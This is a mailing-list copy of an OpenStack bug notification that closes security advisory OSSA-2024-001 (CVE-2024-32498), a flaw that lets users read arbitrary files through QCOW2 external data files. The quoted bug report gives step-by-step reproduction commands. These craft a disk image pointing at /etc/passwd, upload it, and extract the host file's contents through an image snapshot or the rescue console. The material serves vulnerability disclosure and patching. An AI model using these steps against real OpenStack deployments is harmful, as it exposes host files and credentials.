yahoo-eng-team team mailing list archive

Thread
Date

[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: OpenStack Infra <2059809@xxxxxxxxxxxxxxxxxx>
Date: Tue, 02 Jul 2024 16:05:25 -0000
Reply-to: Bug 2059809 <2059809@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx

Reviewed:  https://review.opendev.org/c/openstack/ossa/+/923301
Committed: https://opendev.org/openstack/ossa/commit/eaf70c7fc6530956e5f5060851866963637417a0
Submitter: "Zuul (22348)"
Branch:    master

commit eaf70c7fc6530956e5f5060851866963637417a0
Author: Jeremy Stanley <fungi@xxxxxxxxxxx>
Date:   Wed May 1 20:03:43 2024 +0000

    Add OSSA-2024-001 (CVE-2024-32498)
    
    Change-Id: Ie72ae3022020aaee9bf8c51795afbc6955d91888
    Closes-Bug: #2059809


** Changed in: ossa
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  In Progress
Status in Glance:
  In Progress
Status in OpenStack Compute (nova):
  In Progress
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions